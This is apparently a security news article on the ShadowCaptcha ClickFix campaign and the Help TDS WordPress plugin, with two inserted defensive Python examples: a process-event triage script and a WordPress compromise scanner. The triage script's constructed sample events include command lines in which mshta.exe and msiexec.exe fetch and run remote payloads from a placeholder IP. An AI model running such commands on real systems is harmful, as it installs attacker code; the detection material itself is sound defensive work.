ShadowCaptcha Exploits WordPress Sites to Spread Ransomware, Info Stealers, and Crypto Miners

By The Hacker News
August 26, 2025


A new large-scale campaign has been observed exploiting over 100 compromised WordPress sites to direct site visitors to fake CAPTCHA verification pages that employ the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners.

The large-scale cybercrime campaign, first detected in August 2025, has been codenamed ShadowCaptcha by the Israel National Digital Agency.

“The campaign […] blends social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain a foothold in targeted systems,” researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman said.

“The ultimate objectives of ShadowCaptcha are collecting sensitive information through credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit profits, and even causing ransomware outbreaks.”

The attacks begin with unsuspecting users visiting a compromised WordPress website that has been injected with malicious JavaScript code that’s responsible for initiating a redirection chain that takes them to a fake Cloudflare or Google CAPTCHA page.

From there, the attack chain forks into two, depending on the ClickFix instructions displayed on the web page: One that utilizes the Windows Run dialog and another that guides the victim to save a page as an HTML Application (HTA) and then run it using mshta.exe.


The execution flow triggered via the Windows Run dialog culminates in the deployment of Lumma and Rhadamanthys stealers via MSI installers launched using msiexec.exe or through remotely-hosted HTA files run using mshta.exe, whereas the execution of the saved HTA payload results in the installation of Epsilon Red ransomware.
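The execution chain above (a command pasted into the Run dialog that launches mshta.exe or msiexec.exe against a remotely hosted payload) leaves a characteristic trace in endpoint process-creation telemetry. The following Python triage script is an added example, not part of the article or of the researchers' tooling. It runs over a few constructed, simplified process events (the pipe-separated format and the 203.0.113.0/24 documentation addresses are constructed for the example, not a vendor log schema) and flags the combinations that match the ClickFix pattern: a LOLBin started by the interactive shell, and a command line that points at a remote URL.

```python
"""Triage constructed process-creation events for the ClickFix execution chain:
user pastes a command -> explorer.exe spawns mshta.exe / msiexec.exe -> remote payload.
Added example; the event format below is constructed, not a real vendor schema."""
import re
from dataclasses import dataclass

# Constructed sample events in the form  parent_image|child_image|command_line
SAMPLE_EVENTS = [
    r"explorer.exe|mshta.exe|mshta.exe http://203.0.113.10/verify.hta",
    r"explorer.exe|msiexec.exe|msiexec.exe /i https://203.0.113.10/update.msi /qn",
    r"explorer.exe|mshta.exe|mshta.exe C:\Users\bob\Downloads\captcha.hta",
    r"svchost.exe|msiexec.exe|msiexec.exe /i C:\Windows\Installer\1a2b.msi /qn",
    r"explorer.exe|notepad.exe|notepad.exe notes.txt",
]

# Living-off-the-land binaries the article names for this campaign.
LOLBINS = {"mshta.exe", "msiexec.exe"}
# The interactive shell is the parent when a user runs something via the Run dialog
# or double-clicks a saved .hta file.
INTERACTIVE_PARENTS = {"explorer.exe"}
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)


@dataclass
class Finding:
    child: str
    cmdline: str
    reasons: list

    @property
    def score(self) -> int:
        # One point per matched indicator; 2 means both a remote URL and an
        # interactive parent, the strongest ClickFix signal in this toy model.
        return len(self.reasons)


def parse_event(line: str):
    """Split a constructed 'parent|child|cmdline' line; returns None if malformed."""
    parts = line.split("|", 2)
    if len(parts) != 3:
        return None
    parent, child, cmdline = (p.strip() for p in parts)
    return parent.lower(), child.lower(), cmdline


def triage(events):
    """Return a Finding for every LOLBin launch that carries a ClickFix indicator."""
    findings = []
    for line in events:
        parsed = parse_event(line)
        if parsed is None:
            continue
        parent, child, cmdline = parsed
        if child not in LOLBINS:
            continue
        reasons = []
        if REMOTE_URL.search(cmdline):
            reasons.append("remote payload URL on command line")
        if parent in INTERACTIVE_PARENTS:
            reasons.append(f"{child} launched by interactive shell ({parent})")
        if reasons:
            findings.append(Finding(child, cmdline, reasons))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[score {f.score}] {f.child}: {f.cmdline}\n    " + "; ".join(f.reasons))
```

In a real deployment the same two conditions map onto Sysmon Event ID 1 or EDR process-start fields (parent image, image, command line); the msiexec launched by svchost.exe with a local path is left alone because that is what a normal Windows Installer service run looks like, which is why the parent matters as much as the binary name.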

It’s worth pointing out that the use of ClickFix lures to trick users into downloading malicious HTA files for spreading Epsilon Red ransomware was documented last month by CloudSEK.

“The compromised ClickFix page automatically executes obfuscated JavaScript that uses ‘navigator.clipboard.writeText’ to copy a malicious command to the user’s clipboard without any interaction, relying on users to paste and run it unknowingly,” the researchers said.

The attacks are characterized by the use of anti-debugger techniques to prevent inspection of web pages using browser developer tools, while also relying on DLL side-loading to execute malicious code under the guise of legitimate processes.

Select ShadowCaptcha campaigns have been observed delivering an XMRig-based cryptocurrency miner, with some variants fetching the mining configuration from a Pastebin URL rather than hard-coding it in the malware, which allows the operators to adjust the parameters on the fly.

In cases where the miner payloads are deployed, the attackers have also been observed dropping a vulnerable driver (“WinRing0x64.sys”) to achieve kernel-level access and interact with CPU registers, with the aim of improving mining efficiency.

A majority of the infected WordPress sites are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning the technology, hospitality, legal/finance, healthcare, and real estate sectors.

To mitigate the risks posed by ShadowCaptcha, it’s essential to train users to watch out for ClickFix campaigns, segment networks to prevent lateral movement, and ensure WordPress sites are kept up-to-date and secured using multi-factor authentication (MFA) protections.

“ShadowCaptcha shows how social-engineering attacks have evolved into full-spectrum cyber operations,” the researchers said. “By tricking users into running built-in Windows tools and layering obfuscated scripts and vulnerable drivers, operators gain stealthy persistence and can pivot between data theft, crypto mining, or ransomware.”

The disclosure comes as GoDaddy detailed the evolution of Help TDS, a traffic distribution (or direction) system that has been active since 2017 and has been linked to malicious schemes like VexTrio Viper. Help TDS provides partners and affiliates with PHP code templates that are injected into WordPress sites, ultimately directing users to malicious destinations based on the targeting criteria.


“The operation specializes in tech support scams utilizing full-screen browser manipulation and exit prevention techniques to trap victims on fraudulent Microsoft Windows security alert pages, with fallback monetization through dating, cryptocurrency, and sweepstakes scams,” security researcher Denis Sinegubko said.

Some of the notable malware campaigns that have leveraged Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages, for their part, use JavaScript to force browsers to enter full-screen mode and display the fraudulent alert and even feature counterfeit CAPTCHA challenges before rendering them in a bid to sidestep automated security scanners.

Help TDS operators are said to have developed a malicious WordPress plugin known as “woocommerce_inputs” between late 2024 and August 2025 to enable the redirection functionality, alongside steadily adding credential harvesting, geographic filtering, and advanced evasion techniques. The plugin is estimated to be installed on over 10,000 sites worldwide.

The malicious plugin masquerades as WooCommerce to evade detection by site owners. It’s exclusively installed by attackers after compromising WordPress sites through stolen administrator credentials.
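Both campaigns in this article leave artifacts on the compromised WordPress install itself: injected JavaScript that writes to the clipboard (the ClickFix lure) or forces full-screen mode (the Help TDS scam pages), and, for Help TDS, a plugin directory named “woocommerce_inputs” that is not the real WooCommerce plugin. The Python scanner below is an added example, not code from the article, GoDaddy, or the Israel National Digital Agency. It builds a small constructed WordPress directory tree in a temporary folder, then walks it looking for those two indicators; the pattern names and the sample file contents are constructed for the example. Hits are triage leads, not verdicts: legitimate themes also use `navigator.clipboard.writeText` for copy buttons, so a match should be reviewed rather than auto-quarantined.

```python
"""Scan a WordPress document root for the two on-site indicators described in
the article: the rogue 'woocommerce_inputs' plugin directory and injected
JavaScript that writes the clipboard or forces full-screen mode.
Added example; the sample site built below is constructed, not real data."""
import re
import shutil
import tempfile
from pathlib import Path

# Plugin directory name reported for Help TDS (from the article). The genuine
# WooCommerce plugin lives in wp-content/plugins/woocommerce.
SUSPICIOUS_PLUGIN_DIRS = {"woocommerce_inputs"}

# Script behaviours the article attributes to the ClickFix / scam pages.
INJECTION_PATTERNS = {
    "clipboard_write": re.compile(r"navigator\.clipboard\.writeText", re.IGNORECASE),
    "forced_fullscreen": re.compile(r"requestFullscreen\s*\(", re.IGNORECASE),
}
SCANNED_SUFFIXES = {".php", ".js", ".html"}


def scan_site(root):
    """Return sorted (relative_path, description) pairs for every indicator found."""
    root = Path(root)
    findings = []

    plugins = root / "wp-content" / "plugins"
    if plugins.is_dir():
        for entry in plugins.iterdir():
            if entry.is_dir() and entry.name in SUSPICIOUS_PLUGIN_DIRS:
                findings.append((entry.relative_to(root).as_posix(), "rogue plugin directory"))

    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCANNED_SUFFIXES:
            continue
        text = path.read_text(errors="ignore")
        hits = sorted(name for name, rx in INJECTION_PATTERNS.items() if rx.search(text))
        if hits:
            findings.append((path.relative_to(root).as_posix(), ",".join(hits)))

    return sorted(findings)


def build_sample_site():
    """Create a constructed WordPress tree containing one rogue plugin and one injected footer."""
    root = Path(tempfile.mkdtemp(prefix="wp_sample_"))
    rogue = root / "wp-content" / "plugins" / "woocommerce_inputs"
    rogue.mkdir(parents=True)
    (rogue / "woocommerce_inputs.php").write_text("<?php // constructed rogue plugin stub\n")

    theme = root / "wp-content" / "themes" / "site"
    theme.mkdir(parents=True)
    (theme / "header.php").write_text("<?php wp_head(); ?>\n")  # clean file, no hit expected
    (theme / "footer.php").write_text(
        "<?php wp_footer(); ?>\n"
        "<script>/* constructed injected snippet */\n"
        "navigator.clipboard.writeText(cmd);\n"
        "document.documentElement.requestFullscreen();</script>\n"
    )
    return root


if __name__ == "__main__":
    site = build_sample_site()
    try:
        for rel_path, what in scan_site(site):
            print(f"{rel_path}: {what}")
    finally:
        shutil.rmtree(site, ignore_errors=True)
```

Pointing `scan_site` at a real document root is a reasonable first pass after a suspected compromise; the cheaper control the article recommends still applies first, since the plugin is only ever installed with stolen administrator credentials, so MFA on wp-admin removes the entry point rather than just the symptom.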

“This plugin serves as both a traffic monetization tool and credential harvesting mechanism, demonstrating continuous evolution from simple redirect functionality to a sophisticated malware-as-a-service offering,” GoDaddy said.

“By providing ready-made solutions including C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has lowered the barrier to entry for cybercriminals seeking to monetize infiltrated websites.”
